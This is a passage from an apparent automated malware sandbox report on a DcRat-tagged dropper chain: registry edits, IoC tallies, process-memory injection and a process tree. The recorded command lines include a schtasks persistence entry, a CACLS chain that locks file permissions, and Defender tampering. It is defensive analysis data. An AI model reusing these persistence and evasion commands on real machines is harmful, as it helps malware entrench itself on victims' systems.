\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1232 3kL08dC.exe 1232 3kL08dC.exe 3780 AppLaunch.exe 3780 AppLaunch.exe 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE 3272 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3272 Explorer.EXE -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1232 3kL08dC.exe 1240 toolspub2.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
pid Process 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3780 AppLaunch.exe Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeDebugPrivilege 5968 11D2.exe Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeDebugPrivilege 2232 17BF.exe Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeDebugPrivilege 6084 K.exe Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE Token: SeShutdownPrivilege 3272 Explorer.EXE Token: SeCreatePagefilePrivilege 3272 Explorer.EXE -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 4832 msiexec.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3272 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 464 wrote to memory of 4404 464 file.exe 88 PID 464 wrote to memory of 4404 464 file.exe 88 PID 464 wrote to memory of 4404 464 file.exe 88 PID 4404 wrote to memory of 3496 4404 Ha4Ha21.exe 89 PID 4404 wrote to memory of 3496 4404 Ha4Ha21.exe 89 PID 4404 wrote to memory of 3496 4404 Ha4Ha21.exe 89 PID 3496 wrote to memory of 1076 3496 FM3vI91.exe 90 PID 3496 wrote to memory of 1076 3496 FM3vI91.exe 90 PID 3496 wrote to memory of 1076 3496 FM3vI91.exe 90 PID 1076 wrote to memory of 2604 1076 nE5Ky95.exe 91 PID 1076 wrote to memory of 2604 1076 nE5Ky95.exe 91 PID 1076 wrote to memory of 2604 1076 nE5Ky95.exe 91 PID 2604 wrote to memory of 5048 2604 Ac7YA91.exe 93 PID 2604 wrote to memory of 5048 2604 Ac7YA91.exe 93 PID 2604 wrote to memory of 5048 2604 Ac7YA91.exe 93 PID 5048 wrote to memory of 3780 5048 1hk24dD4.exe 94 PID 5048 wrote to memory of 3780 5048 1hk24dD4.exe 94 PID 5048 wrote to memory of 3780 5048 1hk24dD4.exe 94 PID 5048 wrote to memory of 3780 5048 1hk24dD4.exe 94 PID 5048 wrote to memory of 3780 5048 1hk24dD4.exe 94 PID 5048 wrote to memory of 3780 5048 1hk24dD4.exe 94 PID 5048 wrote to memory of 3780 5048 1hk24dD4.exe 94 PID 5048 wrote to memory of 3780 5048 1hk24dD4.exe 94 PID 2604 wrote to memory of 4908 2604 Ac7YA91.exe 95 PID 2604 wrote to memory of 4908 2604 Ac7YA91.exe 95 PID 2604 wrote to memory of 4908 2604 Ac7YA91.exe 95 PID 1076 wrote to memory of 1232 1076 nE5Ky95.exe 98 PID 1076 wrote to memory of 1232 1076 nE5Ky95.exe 98 PID 1076 wrote to memory of 1232 1076 nE5Ky95.exe 98 PID 3496 wrote to memory of 2452 3496 FM3vI91.exe 101 PID 3496 wrote to memory of 2452 3496 FM3vI91.exe 101 PID 3496 wrote to memory of 2452 3496 FM3vI91.exe 101 PID 2452 wrote to memory of 4084 2452 4LK852dG.exe 102 PID 2452 wrote to memory of 4084 2452 4LK852dG.exe 102 PID 2452 wrote to memory of 4084 2452 4LK852dG.exe 102 PID 2452 wrote to memory of 4084 2452 4LK852dG.exe 102 PID 2452 wrote to memory of 4084 2452 4LK852dG.exe 102 PID 2452 wrote to memory of 4084 2452 4LK852dG.exe 102 PID 2452 wrote to memory of 4084 2452 4LK852dG.exe 102 PID 2452 wrote to memory of 4084 2452 4LK852dG.exe 102 PID 4404 wrote to memory of 1184 4404 Ha4Ha21.exe 103 PID 4404 wrote to memory of 1184 4404 Ha4Ha21.exe 103 PID 4404 wrote to memory of 1184 4404 Ha4Ha21.exe 103 PID 1184 wrote to memory of 696 1184 5YC8Gc0.exe 104 PID 1184 wrote to memory of 696 1184 5YC8Gc0.exe 104 PID 1184 wrote to memory of 696 1184 5YC8Gc0.exe 104 PID 464 wrote to memory of 2512 464 file.exe 105 PID 464 wrote to memory of 2512 464 file.exe 105 PID 464 wrote to memory of 2512 464 file.exe 105 PID 696 wrote to memory of 4356 696 explothe.exe 106 PID 696 wrote to memory of 4356 696 explothe.exe 106 PID 696 wrote to memory of 4356 696 explothe.exe 106 PID 2512 wrote to memory of 4392 2512 6NR6Cu4.exe 108 PID 2512 wrote to memory of 4392 2512 6NR6Cu4.exe 108 PID 696 wrote to memory of 4380 696 explothe.exe 109 PID 696 wrote to memory of 4380 696 explothe.exe 109 PID 696 wrote to memory of 4380 696 explothe.exe 109 PID 4380 wrote to memory of 2644 4380 cmd.exe 112 PID 4380 wrote to memory of 2644 4380 cmd.exe 112 PID 4380 wrote to memory of 2644 4380 cmd.exe 112 PID 4380 wrote to memory of 1952 4380 cmd.exe 113 PID 4380 wrote to memory of 1952 4380 cmd.exe 113 PID 4380 wrote to memory of 1952 4380 cmd.exe 113 PID 4380 wrote to memory of 2128 4380 cmd.exe 115 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3272 -
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- DcRat
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ha4Ha21.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ha4Ha21.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\FM3vI91.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\FM3vI91.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nE5Ky95.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nE5Ky95.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ac7YA91.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ac7YA91.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hk24dD4.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hk24dD4.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3780
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2my3348.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2my3348.exe7⤵
- Executes dropped EXE
PID:4908
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3kL08dC.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3kL08dC.exe6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1232
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4LK852dG.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4LK852dG.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵PID:4084
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5YC8Gc0.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5YC8Gc0.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F6⤵
- DcRat
- Creates scheduled task(s)
PID:4356
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:2644
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:N"7⤵PID:1952
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:R" /E7⤵PID:2128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:2776
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:N"7⤵PID:1704
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:R" /E7⤵PID:528
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main6⤵
- Loads dropped DLL
PID:5520
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6NR6Cu4.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6NR6Cu4.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CFD3.tmp\CFD4.tmp\CFE5.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6NR6Cu4.exe"4⤵PID:4392
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login5⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3212 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x184,0x188,0x18c,0x160,0x190,0x7fffc61046f8,0x7fffc6104708,0x7fffc61047186⤵PID:1044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:36⤵PID:2752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:86⤵PID:1136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:26⤵PID:3288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:16⤵PID:960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:16⤵PID:4492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:16⤵PID:4768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:16⤵PID:4536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:16⤵PID:5168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:16⤵PID:6024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:16⤵PID:6032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:86⤵PID:3820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:86⤵PID:4608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5084 /prefetch:86⤵PID:5356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:16⤵PID:1096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6672 /prefetch:16⤵PID:3308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6768 /prefetch:16⤵PID:5584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,3351794265623736966,10738348408338894653,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:16⤵PID:5844
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/5⤵PID:4816
-
